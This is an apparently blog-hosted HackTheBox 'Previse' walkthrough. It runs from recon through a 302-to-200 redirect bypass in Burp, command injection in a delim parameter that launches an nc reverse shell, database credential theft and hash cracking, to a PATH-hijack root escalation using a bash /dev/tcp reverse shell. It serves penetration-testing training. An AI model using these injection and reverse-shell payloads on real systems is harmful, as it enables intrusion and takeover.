HackTheBox – Previse Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.104
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir –url http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
┌──(rootkali)-[/home/kali/Downloads]
└─# nikto -h 10.10.11.104
We get
/config.php
On, requesting to ‘config.php’ I got nothing in response.
Let’s see what’s there in nav.php. we get this from gobuster
So in this directory, I have found that create an account.
http://10.10.11.104/config.php
No click on Account option
which let’s me to create an account on this website. but this page has been redirected to login.php
So I’ve used Burp to create an account.
First, Open burpsuite tool to capture the request.
So I have captured the request… next right-click the mouse you get the do intercept option and click the response to this request ( shown below image)
And the send request to response
Now you get the response in the burpsuit and change status code from 302 to 200 OK
use this trick to change 302 to 200 in request and send the response to the browser
Now I was able to create the account on the website.
Now let’s create a username and password.
Click on files
┌──(rootkali)-[/home/kali/Downloads]
└─# mkdir test1
┌──(rootkali)-[/home/kali/Downloads]
└─# cp siteBackup.zip test1/
┌──(rootkali)-[/home/kali/Downloads]
└─# cd test1
┌──(rootkali)-[/home/kali/Downloads/test1]
└─# unzip siteBackup.zip
┌──(rootkali)-[/home/kali/Downloads/test1]
└─# cat config.php
Now that we have a juicy info lets try to get Reverse Shell.
Entering to file log i was able to see the delimiter. so capture this request in a burpsuit.
From the extracted site backup zip file we can see file_logs.php
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 5121
So let’s intercept the request and try to get Reverse Shell.
From extracted file we can see logs.php
http://10.10.11.104/file_logs.php
click on submit
delim=comma%26nc+-e+/bin/sh+10.10.14.8+5121
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@previse:/home/m4lwhere$ mysql -u root -D previse -p
password: mySQL_p@ssw0rd!:)
mysql> show tables;
mysql> SELECT * FROM accounts;
Now it will show the account and password.
So the username is m4lwhere and the password is in the hash format.
Next, we going to crack the password using john.
use the wordlist rockyou.txt
So the password is ilovecody112235!
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh m4lwhere@10.10.11.104
So next we going to take over the root flag using privilege escalation
PRIVILEGE ESCALATION
Now, let’s see what command this user can run using “sudo”
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
Further analyzing the file I have found a vulnerability which is path injection
So now enter into the tmp folder.
Transfer the payload and the payload should be in the name of gzip.
before that set the listener in our local machine
open another terminal
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 5121
Next, go to the machine and enter the below command
First, enter the payload shown in the below image
m4lwhere@previse:~$ cd /tmp
m4lwhere@previse:/tmp$ ls
m4lwhere@previse:/tmp$ echo “bash -i >& /dev/tcp/10.10.14.8/5121 0>&1” > gzip
m4lwhere@previse:/tmp$ chmod 777 gzip
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
Related Posts
Hack The Box – Spectra
Hack The Box – Breadcrumbs
